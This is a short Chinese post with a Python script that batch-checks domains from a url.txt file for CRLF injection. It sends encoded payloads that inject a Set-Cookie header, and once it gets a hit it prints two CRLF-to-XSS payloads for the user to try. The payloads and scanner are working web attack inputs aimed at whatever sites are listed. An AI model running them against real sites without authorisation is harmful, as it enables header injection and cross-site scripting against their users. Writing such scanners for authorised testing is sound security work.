使用requests模块简单实现了一下批量crlf漏洞的检测,代码如下
import requests
poc_list = ['%0D%0A%20Set-Cookie:whoami=yueying', '%20%0D%0ASet-Cookie:whoami=yueying',
'%0A%20Set-Cookie:whoami=yueying',
'%2F%2E%2E%0D%0ASet-Cookie:whoami=yueying', '%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=yueying']
xss = '''
请自行尝试xss,payload如下。
payload1:https://xxx.xxx.com/%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>;
payload2:https://xxx.xxx.com/%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
'''
GREEN = '\033[92m' # 绿色
RED = '\033[91m' # 红色
END = '\033[0m' # 结束
def respon(url):
try:
response = requests.get(url, timeout=8)
response_header = str(response.headers)
if 'yueying' in response_header:
print(GREEN + '存在crlf漏洞!!')
print(GREEN + '漏洞poc为:' + url)
print(xss)
else:
print(RED + f'{url}未发现crlf漏洞')
except:
print(RED + f'{url}连接超时')
def ping(url):
try:
ping = requests.get(url, timeout=8)
if ping.status_code != 200:
print(f'{url}无法访问')
else:
piliang()
except:
print(f'{url}无法访问')
def piliang():
if url.endswith('/'):
for poc in poc_list:
new_url = url + poc
respon(new_url)
else:
for poc in poc_list:
new_url = url + '/' + poc
respon(new_url)
if __name__ == '__main__':
bangzhu = '''
欢迎使用crlf检测工具,作者月影
请将需要检测的域名列表放置当前目录下的url。txt中,然后执行本脚本
'''
print(bangzhu)
with open('url.txt', 'r') as file:
urls = file.readlines()
urls = ['http://' + url.strip() if not url.startswith(('http://', 'https://')) else url.strip() for url in urls]
for url in urls:
ping(url)
效果展示
评论 (1)